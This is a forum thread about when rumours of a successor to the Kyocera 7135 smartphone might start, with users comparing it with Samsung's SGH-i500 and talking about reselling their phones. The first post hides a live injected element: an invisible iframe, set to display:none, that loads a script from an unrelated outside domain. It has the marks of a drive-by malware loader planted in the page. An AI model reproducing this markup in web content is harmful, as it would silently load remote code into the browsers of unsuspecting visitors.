Poll: When do you suspect we'll begin to see rumors floating of a 7135 replacement from Kyo

+ Reply to Thread

When Will the Rumors Begin on a 7135 Replacement?

The 7135 has been available from one source or another for about 10 months. It seems we should be hearing rumors of a next-generation smartphone from Kyocera pretty soon. When do you suspect those rumors will begin floating?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Dave

I said no sooner than March referring to Kyocera but I'm thinking we will hear something as soon as Samsung's SGH-i500 is released. With number portability and Samsung's SGH-i500 on the horizon, I think VZW and Kyocera will want to avoid people switching carriers to obtain this phone.

Originally posted by Beryl
    I said no sooner than March referring to Kyocera but I'm thinking we will hear something as soon as Samsung's SGH-i500 is released. With number portability and Samsung's SGH-i500 on the horizon, I think VZW and Kyocera will want to avoid people switching carriers to obtain this phone.
    There are rumors (admittedly unsubstantiated) that Samsung will also produce a CDMA version of the SGH-i500. I'd LOVE to see that happen!!!
    Dave

Originally posted by dwdod
    There are rumors (admittedly unsubstantiated) that Samsung will also produce a CDMA version of the SGH-i500. I'd LOVE to see that happen!!!
    Me too, although there is no way my company will pay for it so soon after picking up the cost of my 7135, and my wife won't let me spend that kind of money on it when I have a perfectly good 7135 here.

I actually will probably want to wait for the next generation and get an EV-DO capable phone anyway...

Alan

Alan,
    Can you put your phone on ebay? I will probably do that if I can't sell it to someone at my work place.

Originally posted by Beryl
    Alan,
    Can you put your phone on ebay? I will probably do that if I can't sell it to someone at my work place.
    Yeah, if the next great thing comes along, I could go that route. My company bought it, but after a year, it is mine to do with as I please, so just two more months to go.

Alan

I can't believe that we're closing in on a year since some people got their 7135's!

I am still a bit concerned that Kyocera might feel burned by the whole 7135 fiasco. And they are working on all of those kiddie phones. It wouldn't shock me if they aren't in any rush to put out a successor to the 7135... but I hope I'm wrong! The SGH-i500 has some nice specs, but I don't like the idea of no graffiti area on the bottom half of the phone. It seems to me like it would be pretty awkward trying to write on the top half of the phone.
    Please visit my picture site: Robert-O-Rama :)